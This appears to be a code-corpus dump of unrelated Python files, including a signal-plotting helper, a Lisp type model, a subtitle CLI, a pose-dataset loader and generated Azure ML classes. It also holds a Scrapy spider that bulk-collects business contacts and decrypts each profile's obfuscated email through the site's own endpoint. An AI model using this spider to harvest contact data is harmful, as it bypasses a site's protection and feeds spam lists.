        spl_rate: spatial sampling rate [px/mm].
    """
    n = len(space_series)
    period = 1 / spl_rate  # spatial sampling interval [mm]
    yf = scipy.fft.fft(space_series)
    # Single-sided amplitude spectrum: first n/2 bins, scaled by 2/n.
    y = 2.0 / n * np.abs(yf[:n // 2])
    # Frequency axis from 0 up to the Nyquist frequency 1/(2*period).
    x = np.linspace(0.0, 1.0 / (2.0 * period), int(n / 2))
    fig, ax = plt.subplots()
    # NOTE(review): the y label says power, but y is an amplitude spectrum
    # (10*log10 of amplitude, not 20*log10) — confirm the intended units.
    ax.plot(x, 10 * np.log10(y))
    plt.grid()
    plt.xlabel('Frequency [$mm^{-1}$]')
    plt.ylabel('Power/Frequency [$dB/mm^{-1}$]')
    return plt.show()
# Script entry: load the spectrogram dataset for the two subject groups.
subjects_G1 = "AMD"
subjects_G2 = "normal"
str_dataPath = r'C:/Users/cnzak/Desktop/data/avRNS/biophotonics'
# ML input data : 'drusenConverter' --> [stateFull_Data]; 'ccConverter' --> [stateFull_Data2]
sampling_rate = 200  # sampling frequency, 600/3 = 200 px/mm
# Uncomment to load the dataset pre-split into train/test sets instead:
# X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_split_spec_dataset(subjects_G1, subjects_G2,
#                                                                                         str_dataPath, sampling_rate)
X_orig, Y_orig, classes = load_spec_dataset(subjects_G1, subjects_G2, str_dataPath, sampling_rate)
| StarcoderdataPython |
3452631 | # scrapy crawl greenbook -s LOG_FILE=scrapy.log -o data.csv
import scrapy
class GreenbookSpider(scrapy.Spider):
    """Crawl thegreenbook.com category listings and emit one item per
    company profile, POSTing to the site's DecryptEmail endpoint when a
    profile embeds an encrypted e-mail address.
    """

    name = 'greenbook'
    start_urls = [
        'http://www.thegreenbook.com/products/search/architect-builder-contractor-guides/'
    ]

    def parse(self, response):
        """Follow every category link found on the search-results page."""
        for href in response.xpath(
                '//div[@id="div_Search_Results_Found"]/descendant-or-self::*/@href'
        ).extract():
            yield scrapy.Request(
                response.urljoin(href),
                callback=self.parse_listing,
                errback=self.errback,
                meta={
                    'bigcat': response.url,
                    'page': 1
                })

    def parse_listing(self, response):
        """Request each company profile on a listing page, then paginate."""
        for href in response.xpath(
                '//a[@itemprop="CompanyName"]/@href').extract():
            yield scrapy.Request(
                href,
                callback=self.parse_company,
                errback=self.errback,
                meta={
                    'bigcat': response.meta['bigcat'],
                    'smallcat': response.url
                })

        # On the first page the category URL is the response URL itself;
        # later pages carry it forward via meta['category url'].
        # NOTE(review): 'page' is the int 1 on the first call but a str on
        # every later call (next_page below is str); the == 1 test still
        # works, but normalizing the type would be cleaner.
        if response.meta['page'] == 1:
            category_url = response.url
        else:
            category_url = response.meta['category url']
        # Keep paginating until the site serves its 404 marker div.
        if response.xpath('//div[@id="error404"]').extract_first() is None:
            next_page = str(1 + int(response.meta['page']))
            next_page_url = category_url + 'page/' + next_page + '/'
            yield scrapy.Request(
                next_page_url,
                callback=self.parse_listing,
                errback=self.errback,
                meta={
                    'bigcat': response.meta['bigcat'],
                    'page': next_page,
                    'category url': category_url
                })

    def parse_company(self, response):
        """Scrape one company profile; fields absent on the page become ''."""
        def extract_with_xpath(query):
            # First match, stripped; assumes the query matched (else raises).
            return response.xpath(query).extract_first().strip()

        if response.xpath('//div[@class="breadcrumb"]/h1/text()'
                          ).extract_first() is not None:
            coname = extract_with_xpath('//div[@class="breadcrumb"]/h1/text()')
        else:
            coname = ""
        if response.xpath('//span[@class="phoneNum"]/text()').extract_first(
        ) is not None:
            phone = response.xpath(
                '//span[@class="phoneNum"]/text()').extract_first().strip()
        else:
            phone = ""
        if response.xpath(
                '//span[@class="faxNum"]/text()').extract_first() is not None:
            fax = response.xpath(
                '//span[@class="faxNum"]/text()').extract_first().strip()
        else:
            fax = ""
        if response.xpath('//span[@itemprop="CompanyAddress"]/text()'
                          ).extract_first() is not None:
            coaddress = response.xpath(
                '//span[@itemprop="CompanyAddress"]/text()').extract_first(
                ).strip()
        else:
            coaddress = ""
        # If the page embeds an encrypted e-mail, ask the site's endpoint to
        # decrypt it and yield the item from that callback; otherwise yield
        # the item directly with an empty EMAIL field.
        if response.xpath('//input[@id="hidCompEmail"]/@value').extract_first(
        ) is not None:
            hidcompemail = response.xpath(
                '//input[@id="hidCompEmail"]/@value').extract_first()
            yield scrapy.Request(
                'http://www.thegreenbook.com/companyprofile.aspx/DecryptEmail',
                body="{sEmail: '" + hidcompemail + "'}",
                method='POST',
                headers={
                    'Content-Type': 'application/json',
                },
                callback=self.parse_w_email,
                meta={
                    'HREF': response.url,
                    'CONAME': coname,
                    'PHONE': phone,
                    'FAX': fax,
                    'ADDRESS': coaddress,
                    'FAILMSG': '',
                    'BIGCAT': response.meta['bigcat'],
                    'SMALLCAT': response.meta['smallcat']
                })
        else:
            yield {
                'HREF': response.url,
                'CONAME': coname,
                'EMAIL': '',
                'PHONE': phone,
                'FAX': fax,
                'ADDRESS': coaddress,
                'FAILMSG': '',
                'BIGCAT': response.meta['bigcat'],
                'SMALLCAT': response.meta['smallcat']
            }

    def parse_w_email(self, response):
        """Yield the company item with the decrypted-e-mail response body."""
        yield {
            'HREF': response.meta['HREF'],
            'CONAME': response.meta['CONAME'],
            'EMAIL': response.body,
            'PHONE': response.meta['PHONE'],
            'FAX': response.meta['FAX'],
            'ADDRESS': response.meta['ADDRESS'],
            'FAILMSG': '',
            'BIGCAT': response.meta['BIGCAT'],
            'SMALLCAT': response.meta['SMALLCAT']
        }

    def errback(self, failure):
        """Record a failed request as an item carrying the failure text."""
        yield {
            'HREF': failure.request.url,
            'FAILMSG': repr(failure),
        }
| StarcoderdataPython |
3357655 | <filename>compiler/eLisp/eLisp/model.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2015 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class BaseType(object):
    """Common base for eLisp scalar types; wraps a raw value in ``val``.

    Equality and ordering only hold between instances of the same wrapper
    class (subclasses included, via isinstance); comparisons against other
    types are simply False.
    """

    def __init__(self, val):
        self.val = val

    def __str__(self):
        # Intentionally returns None; concrete subclasses override this.
        pass

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.val == other.val

    def __ne__(self, other):
        return not self.__eq__(other)

    def __lt__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.val < other.val

    def __le__(self, other):
        return self.__lt__(other) or self.__eq__(other)

    def __gt__(self, other):
        return not self.__le__(other)

    def __ge__(self, other):
        return not self.__lt__(other)

    def __nonzero__(self):
        # Python 2 truthiness hook: every wrapped value is truthy.
        return True
class Number(BaseType):
    """Numeric literal; prints as the bare value."""

    def __str__(self):
        return str(self.val)
class Boolean(BaseType):
    """Scheme-style boolean; prints as #t or #f."""

    def __str__(self):
        if self.val:
            return '#t'
        return '#f'

    def __nonzero__(self):
        # Python 2 truthiness hook: follow the wrapped value directly.
        return self.val
class Character(BaseType):
    """Character literal; prints with the #\\ reader prefix."""

    def __str__(self):
        return '#\\' + str(self.val)
class String(BaseType):
    """String literal; prints surrounded by double quotes."""

    def __str__(self):
        return '"' + str(self.val) + '"'
class Symbol(BaseType):
    """Symbol; prints as its bare name (the wrapped string itself)."""

    def __str__(self):
        return self.val
class EmptyList(object):
    """Singleton type for the empty Lisp list ``()``."""

    def __str__(self):
        return '()'

    def __eq__(self, other):
        # Any two instances of this type compare equal.
        return isinstance(other, type(self))

    def __nonzero__(self):
        # Python 2 truthiness hook: '() is truthy in eLisp.
        return True


# Rebind the name to a single instance; from here on, EmptyList is the
# one-and-only empty-list object (the class itself becomes unreachable).
EmptyList = EmptyList()
class Pair(object):
    """A Lisp cons cell: a ``head`` value and a ``tail`` (Pair, EmptyList,
    or an arbitrary value, which prints in dotted-pair notation)."""

    def __init__(self, head, tail):
        self.head = head
        self.tail = tail

    def __str__(self):
        return '(%s)' % self._write_pair(self)

    @staticmethod
    def _write_pair(pair):
        """Render the cell chain starting at *pair*, without outer parens."""
        head, tail = pair.head, pair.tail
        output = str(head)
        # BUG FIX: was ``isinstance(tail, pair)`` — passing the *instance*
        # as classinfo raises TypeError for any nested pair; the class
        # Pair is the intended second argument.
        if isinstance(tail, Pair):
            output += ' %s' % Pair._write_pair(tail)
            return output
        if tail is EmptyList:
            # Proper list: the trailing empty list is not printed.
            return output
        # Improper list: print as a dotted pair.
        output += ' . %s' % str(tail)
        return output
| StarcoderdataPython |
1819726 | """
Module that contains the command line app.
Why does this file exist, and why not put this in __main__?
You might be tempted to import things from __main__ later, but that will
cause problems: the code will get executed twice:
- When you run `python -msmartass` python will execute
``__main__.py`` as a script. That means there won't be any
``smartass.__main__`` in ``sys.modules``.
- When you import __main__ it will get executed again (as a module) because
there's no ``smartass.__main__`` in ``sys.modules``.
Also see (1) from http://click.pocoo.org/5/setuptools/#setuptools-integration
"""
import logging
from functools import wraps
import click
import pkg_resources
from . import DumbProcessor, SmartProcessor
from .clickutils import ClickContextObj
from .fileutils import open_subfile, update_subfile
LOGGER = logging.getLogger(__name__)
def _common_cli(func):
    """Decorator bundling the CLI options shared by both console commands.

    Wraps *func* with the common click options/arguments (log level,
    backup toggle, comment processing, actor skipping, version, FILE
    arguments) and stores the chosen log level on the click context
    object before invoking *func*.
    """
    default_log_level = logging.getLevelName(logging.INFO).lower()

    @click.option('--log-level', type=click.Choice([
        logging.getLevelName(lev).lower() for lev in [
            logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR,
            logging.CRITICAL]]),
        default=default_log_level, show_default=True,
        show_choices=True,
        help='log level displayed')
    @click.option(
        "--no-backup/--backup", default=True, show_default=True,
        help="enable/disable creation of backup files")
    @click.option(
        "--process-comments/--no-process-comments", default=False,
        show_default=True,
        help='enable/disable processing of comment events')
    @click.option(
        "--skip-name", multiple=True, default=[], metavar='ACTOR_NAME',
        help=(
            "lines by this actor (case insensitive) will be skipped. "
            "May be passed multiple times."))
    @click.version_option(
        pkg_resources.get_distribution(__name__.split('.')[0]).version)
    @click.argument(
        'subfiles', nargs=-1, required=True, metavar='FILE',
        type=click.Path(
            exists=True, file_okay=True, dir_okay=False, writable=True))
    @click.pass_context
    @wraps(func)
    def wrapper(ctx, log_level, *args, **kwargs):
        # Lazily create the shared context object, record the log level on
        # it, and forward everything else to the wrapped command.
        obj = ctx.obj = ctx.obj or ClickContextObj()
        level = getattr(logging, log_level.upper())
        obj.log_level = level
        return ctx.invoke(func, *args, **kwargs)
    return wrapper
def _run_cli(processor_factory, backup, process_comments, skip_name, subfiles):
    """Process each subtitle file with a processor from *processor_factory*.

    Files whose processing raises RuntimeError are logged and skipped;
    files with no updated events are left untouched on disk.
    """
    processor = processor_factory(
        process_comments=process_comments,
        names_to_skip=skip_name)
    for path in subfiles:
        try:
            subdoc, encoding, newline = open_subfile(path)
            counts = processor.process_document(subdoc)
            LOGGER.info('%s: events=%d, processed=%d, updated=%d',
                        path, counts[0], counts[1], counts[2])
            # Only rewrite the file when at least one event changed.
            if counts[2]:
                update_subfile(path, subdoc, encoding, newline, backup)
        except RuntimeError as err:
            LOGGER.error("%s: %s: %s", path, type(err).__name__, str(err))
@click.command(no_args_is_help=True)
@_common_cli
def smartass(*args, **kwargs):
    """Smarten punctuation on ass subtitle files."""
    _run_cli(SmartProcessor, *args, **kwargs)
@click.command(no_args_is_help=True)
@_common_cli
def dumbass(*args, **kwargs):
    """Unsmarten punctuation on ass subtitle files."""
    _run_cli(DumbProcessor, *args, **kwargs)
| StarcoderdataPython |
1988210 | <gh_stars>100-1000
import os
import numpy as np
import scipy.io as sio
from PIL import Image
from deephar.data.datasets import get_clip_frame_index
from deephar.utils import *
ACTION_LABELS = None
def load_h36m_mat_annotation(filename):
    """Load Human3.6M annotations from a MATLAB .mat file.

    Args:
        filename: path to the annotation ``.mat`` file.

    Returns:
        (sequences, action_labels, joint_labels), where *sequences* is a
        3-element list ordered TEST (0), TRAIN (1), VALID (2).
    """
    mat = sio.loadmat(filename, struct_as_record=False, squeeze_me=True)

    # Respect the order of TEST (0), TRAIN (1), and VALID (2)
    sequences = [mat['sequences_te'], mat['sequences_tr'], mat['sequences_val']]
    action_labels = mat['action_labels']
    joint_labels = mat['joint_labels']

    return sequences, action_labels, joint_labels
def serialize_index_sequences(seq):
    """Flatten a list of sequences into (sequence_idx, frame_idx) pairs.

    Args:
        seq: sequence of objects, each exposing a ``frames`` sequence.

    Returns:
        List of ``(s, f)`` tuples covering every frame of every sequence,
        in order.
    """
    # Idiomatic comprehension replacing the original append loop.
    return [(s, f)
            for s in range(len(seq))
            for f in range(len(seq[s].frames))]
class Human36M(object):
    """Implementation of the Human3.6M dataset for 3D pose estimation and
    action recognition.

    topology='sequences' yields clips of ``clip_size`` frames; 'frames'
    yields individual frames addressed through a flat index.
    """

    def __init__(self, dataset_path, dataconf, poselayout=pa17j3d,
                 topology='sequences', clip_size=16):
        assert topology in ['sequences', 'frames'], \
            'Invalid topology ({})'.format(topology)

        self.dataset_path = dataset_path
        self.dataconf = dataconf
        self.poselayout = poselayout
        self.topology = topology
        self.clip_size = clip_size
        self.load_annotations(os.path.join(dataset_path, 'annotations.mat'))

    def load_annotations(self, filename):
        """Load the .mat annotations and build the flat frame index."""
        try:
            self.sequences, self.action_labels, self.joint_labels = \
                load_h36m_mat_annotation(filename)

            # Flat (sequence, frame) index per split, used in 'frames' mode.
            self.frame_idx = [serialize_index_sequences(self.sequences[0]),
                              serialize_index_sequences(self.sequences[1]),
                              serialize_index_sequences(self.sequences[2])]

            global ACTION_LABELS
            ACTION_LABELS = self.action_labels
        except:
            warning('Error loading Human3.6M dataset!')
            raise

    def get_data(self, key, mode, frame_list=None, fast_crop=False):
        """Return a sample dict (frames, poses, camera, action) for *key*.

        In TRAIN_MODE a random data-augmentation configuration is drawn;
        otherwise the fixed configuration is used.
        """
        output = {}

        if mode == TRAIN_MODE:
            dconf = self.dataconf.random_data_generator()
            random_clip = True
        else:
            dconf = self.dataconf.get_fixed_config()
            random_clip = False

        if self.topology == 'sequences':
            seq = self.sequences[mode][key]
            # NOTE(review): prefer "frame_list is None" over "== None".
            if frame_list == None:
                frame_list = get_clip_frame_index(len(seq.frames),
                    dconf['subspl'], self.clip_size,
                    random_clip=random_clip)
            objframes = seq.frames[frame_list]
        else:
            seq_idx, frame_idx = self.frame_idx[mode][key]
            seq = self.sequences[mode][seq_idx]
            objframes = seq.frames[[frame_idx]]

        """Build a Camera object"""
        cpar = seq.camera_parameters
        cam = Camera(cpar.R, cpar.T, cpar.f, cpar.c, cpar.p, cpar.k)

        """Load and project the poses"""
        pose_w = self.load_pose_annot(objframes)
        pose_uvd = cam.project(np.reshape(pose_w, (-1, 3)))
        pose_uvd = np.reshape(pose_uvd,
            (len(objframes), self.poselayout.num_joints, 3))

        """Compute GT bouding box."""
        imgsize = (objframes[0].w, objframes[0].h)
        # Crop is centered on joint 0 (root) across the clip.
        objpos, winsize, zrange = get_crop_params(pose_uvd[:, 0, :],
            imgsize, cam.f, dconf['scale'])
        objpos += dconf['scale'] * np.array([dconf['transx'], dconf['transy']])

        frames = np.empty((len(objframes),) + self.dataconf.input_shape)
        pose = np.empty((len(objframes), self.poselayout.num_joints,
            self.poselayout.dim))

        for i in range(len(objframes)):
            image = 'images/%s/%05d.jpg' % (seq.name, objframes[i].f)
            imgt = T(Image.open(os.path.join(self.dataset_path, image)))

            # Geometric augmentation: rotation+crop, optional h-flip.
            imgt.rotate_crop(dconf['angle'], objpos, winsize)
            if dconf['hflip'] == 1:
                imgt.horizontal_flip()

            imgt.resize(self.dataconf.crop_resolution)
            imgt.normalize_affinemap()
            frames[i, :, :, :] = normalize_channels(imgt.asarray(),
                channel_power=dconf['chpower'])

            # Map (u, v) through the image's affine transform; normalize
            # depth into [0, 1] over the clip's z range.
            pose[i, :, 0:2] = transform_2d_points(imgt.afmat,
                pose_uvd[i, :, 0:2], transpose=True)
            pose[i, :, 2] = \
                (pose_uvd[i, :, 2] - zrange[0]) / (zrange[1] - zrange[0])
            if imgt.hflip:
                pose[i, :, :] = pose[i, self.poselayout.map_hflip, :]

        """Set outsider body joints to invalid (-1e9)."""
        pose = np.reshape(pose, (-1, self.poselayout.dim))
        pose[np.isnan(pose)] = -1e9
        v = np.expand_dims(get_visible_joints(pose[:, 0:2]), axis=-1)
        pose[(v == 0)[:, 0], :] = -1e9
        pose = np.reshape(pose, (len(objframes), self.poselayout.num_joints,
            self.poselayout.dim))
        v = np.reshape(v, (len(objframes), self.poselayout.num_joints, 1))
        pose = np.concatenate((pose, v), axis=-1)

        if self.topology != 'sequences':
            # Single-frame mode: drop the leading clip dimension.
            pose_w = np.squeeze(pose_w, axis=0)
            pose_uvd = np.squeeze(pose_uvd, axis=0)
            pose = np.squeeze(pose, axis=0)
            frames = np.squeeze(frames, axis=0)

        output['camera'] = cam.serialize()
        # Sequence names encode the action id in characters 1-2 (1-based
        # in the name, converted to a 0-based label here).
        output['action'] = int(seq.name[1:3]) - 1
        output['pose_w'] = pose_w
        output['pose_uvd'] = pose_uvd
        output['pose'] = pose
        output['frame'] = frames

        """Take the last transformation matrix, it should not change"""
        output['afmat'] = imgt.afmat.copy()

        return output

    def load_pose_annot(self, frames):
        """Gather the 3D world poses of *frames* in this pose layout."""
        p = np.empty((len(frames), self.poselayout.num_joints,
            self.poselayout.dim))
        for i in range(len(frames)):
            p[i, :] = frames[i].pose3d.T[self.poselayout.map_from_h36m,
                0:self.poselayout.dim].copy()

        return p

    def clip_length(self):
        # Number of frames per sample, or None in single-frame mode.
        if self.topology == 'sequences':
            return self.clip_size
        else:
            return None

    def clip_shape(self):
        # Leading shape tuple for clip-structured outputs.
        if self.topology == 'sequences':
            return (self.clip_size,)
        else:
            return ()

    def get_shape(self, dictkey):
        """Return the output shape for one of get_data's dictionary keys."""
        if dictkey == 'frame':
            return self.clip_shape() + self.dataconf.input_shape
        if dictkey == 'pose':
            return self.clip_shape() \
                + (self.poselayout.num_joints, self.poselayout.dim+1)
        if dictkey == 'pose_w':
            return self.clip_shape() \
                + (self.poselayout.num_joints, self.poselayout.dim)
        if dictkey == 'pose_uvd':
            return self.clip_shape() \
                + (self.poselayout.num_joints, self.poselayout.dim)
        if dictkey == 'action':
            return (1,)
        if dictkey == 'camera':
            return (21,)
        if dictkey == 'afmat':
            return (3, 3)
        raise Exception('Invalid dictkey on get_shape!')

    def get_length(self, mode):
        """Number of samples in the given split, per the topology."""
        if self.topology == 'sequences':
            return len(self.sequences[mode])
        else:
            return len(self.frame_idx[mode])
| StarcoderdataPython |
1839748 | <gh_stars>0
from setuptools import setup, find_packages
from pocketbook import __version__
# Package metadata for the pocketbook command-line wallet.
setup(
    name='pocketbook',
    version=__version__,
    description='Command line wallet application for the Fetch.ai network',
    url='https://github.com/fetchai/tools-pocketbook',
    author='<NAME>',
    author_email='<EMAIL>',
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    # Runtime dependencies (ledger API pinned to a release candidate).
    install_requires=[
        'fetchai-ledger-api==1.0.0rc1',
        'toml',
        'colored',
    ],
    # Optional extras: `pip install pocketbook[dev]` / `[test]`.
    extras_require={
        'dev': ['check-manifest'],
        'test': ['coverage', 'pytest'],
    },
    # Installs the `pocketbook` console command.
    entry_points={
        'console_scripts': [
            'pocketbook=pocketbook.cli:main'
        ],
    },
)
| StarcoderdataPython |
6604755 | from scraper import *
# Run one scraper worker over the configured Letterboxd id range.
# NOTE(review): the semantics of max_iter and scraper_instance are defined
# in scraper.Scraper — confirm there before changing these values.
s = Scraper(start=231660, end=233441, max_iter=30, scraper_instance=130)
s.scrape_letterboxd()
3347908 | from __future__ import absolute_import
from . import Tracker
class IdentityTracker(Tracker):
    """Baseline tracker that always reports the initial bounding box."""

    def __init__(self):
        super(IdentityTracker, self).__init__(
            name='IdentityTracker',
            is_deterministic=True)

    def init(self, image, box):
        # Remember the ground-truth box from the first frame.
        self.box = box

    def update(self, image):
        # Ignore the new frame; re-emit the initial box unchanged.
        return self.box
class IdentityTrackerRGBD(Tracker):
    """RGB-D variant of the baseline: always reports the initial box.

    Same behavior as IdentityTracker but with a depth argument in the
    interface, which is ignored.
    """

    def __init__(self):
        super(IdentityTrackerRGBD, self).__init__(
            name='IdentityTrackerRGBD',
            is_deterministic=True)

    def init(self, image, box, depth):
        # Remember the ground-truth box from the first frame.
        self.box = box

    def update(self, image, depth):
        # Ignore both the new frame and depth; re-emit the initial box.
        return self.box
12855560 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AssetJobInput(msrest.serialization.Model):
    """Asset input type.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    """

    _validation = {
        # NOTE(review): this pattern only requires *some* word character in
        # the URI; if the whole string must be word characters it should be
        # anchored (e.g. r'^[a-zA-Z0-9_]+$') — confirm against the service
        # spec before changing generated code.
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        """
        super(AssetJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        # Required: raises KeyError when 'uri' is omitted.
        self.uri = kwargs['uri']
class AssetJobOutput(msrest.serialization.Model):
    """Asset output type.

    :ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
    :ivar uri: Output Asset URI. This will have a default value of
     "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
    :vartype uri: str
    """

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
        :keyword uri: Output Asset URI. This will have a default value of
         "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
        :paramtype uri: str
        """
        super(AssetJobOutput, self).__init__(**kwargs)
        # Both fields are optional; the service applies defaults when None.
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs.get('uri', None)
class BatchJob(msrest.serialization.Model):
    """Batch endpoint job.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar compute: Compute configuration used to set instance count.
    :vartype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
    :ivar dataset: Input dataset
     This will be deprecated. Use InputData instead.
    :vartype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
    :ivar description: The asset description text.
    :vartype description: str
    :ivar error_threshold: Error threshold, if the error count for the entire input goes above this
     value,
     the batch inference will be aborted. Range is [-1, int.MaxValue]
     -1 value indicates, ignore all failures during batch inference.
    :vartype error_threshold: int
    :ivar input_data: Input data for the job.
    :vartype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
    :ivar interaction_endpoints: Dictonary of endpoint URIs, keyed by enumerated job endpoints.
    :vartype interaction_endpoints: dict[str,
     ~azure.mgmt.machinelearningservices.models.JobEndpoint]
    :ivar logging_level: Logging level for batch inference operation. Possible values include:
     "Info", "Warning", "Debug".
    :vartype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
    :ivar max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
    :vartype max_concurrency_per_instance: int
    :ivar mini_batch_size: Size of the mini-batch passed to each batch invocation.
     For FileDataset, this is the number of files per mini-batch.
     For TabularDataset, this is the size of the records in bytes, per mini-batch.
    :vartype mini_batch_size: long
    :ivar name:
    :vartype name: str
    :ivar output: Location of the job output logs and artifacts.
    :vartype output: ~azure.mgmt.machinelearningservices.models.JobOutputArtifacts
    :ivar output_data: Job output data location
     Optional parameter: when not specified, the default location is
     workspaceblobstore location.
    :vartype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
    :ivar output_dataset: Output dataset location
     Optional parameter: when not specified, the default location is
     workspaceblobstore location.
     This will be deprecated. Use OutputData instead.
    :vartype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
    :ivar output_file_name: Output file name.
    :vartype output_file_name: str
    :ivar partition_keys: Partition keys list used for Named partitioning.
    :vartype partition_keys: list[str]
    :ivar properties: The asset property dictionary.
    :vartype properties: dict[str, str]
    :ivar provisioning_state: Possible values include: "Succeeded", "Failed", "Canceled",
     "InProgress".
    :vartype provisioning_state: str or
     ~azure.mgmt.machinelearningservices.models.JobProvisioningState
    :ivar retry_settings: Retry Settings for the batch inference operation.
    :vartype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
    :ivar status: Status of the job. Possible values include: "NotStarted", "Starting",
     "Provisioning", "Preparing", "Queued", "Running", "Finalizing", "CancelRequested", "Completed",
     "Failed", "Canceled", "NotResponding", "Paused", "Unknown".
    :vartype status: str or ~azure.mgmt.machinelearningservices.models.JobStatus
    :ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
    :vartype tags: dict[str, str]
    """

    # Fields marked 'readonly' are server-populated and never serialized
    # on requests (autorest-generated; do not hand-edit the maps).
    _validation = {
        'interaction_endpoints': {'readonly': True},
        'output': {'readonly': True},
        'provisioning_state': {'readonly': True},
        'status': {'readonly': True},
    }

    _attribute_map = {
        'compute': {'key': 'compute', 'type': 'ComputeConfiguration'},
        'dataset': {'key': 'dataset', 'type': 'InferenceDataInputBase'},
        'description': {'key': 'description', 'type': 'str'},
        'error_threshold': {'key': 'errorThreshold', 'type': 'int'},
        'input_data': {'key': 'inputData', 'type': '{JobInput}'},
        'interaction_endpoints': {'key': 'interactionEndpoints', 'type': '{JobEndpoint}'},
        'logging_level': {'key': 'loggingLevel', 'type': 'str'},
        'max_concurrency_per_instance': {'key': 'maxConcurrencyPerInstance', 'type': 'int'},
        'mini_batch_size': {'key': 'miniBatchSize', 'type': 'long'},
        'name': {'key': 'name', 'type': 'str'},
        'output': {'key': 'output', 'type': 'JobOutputArtifacts'},
        'output_data': {'key': 'outputData', 'type': '{JobOutputV2}'},
        'output_dataset': {'key': 'outputDataset', 'type': 'DataVersion'},
        'output_file_name': {'key': 'outputFileName', 'type': 'str'},
        'partition_keys': {'key': 'partitionKeys', 'type': '[str]'},
        'properties': {'key': 'properties', 'type': '{str}'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'retry_settings': {'key': 'retrySettings', 'type': 'BatchRetrySettings'},
        'status': {'key': 'status', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword compute: Compute configuration used to set instance count.
        :paramtype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
        :keyword dataset: Input dataset
         This will be deprecated. Use InputData instead.
        :paramtype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
        :keyword description: The asset description text.
        :paramtype description: str
        :keyword error_threshold: Error threshold, if the error count for the entire input goes above
         this value,
         the batch inference will be aborted. Range is [-1, int.MaxValue]
         -1 value indicates, ignore all failures during batch inference.
        :paramtype error_threshold: int
        :keyword input_data: Input data for the job.
        :paramtype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
        :keyword logging_level: Logging level for batch inference operation. Possible values include:
         "Info", "Warning", "Debug".
        :paramtype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
        :keyword max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
        :paramtype max_concurrency_per_instance: int
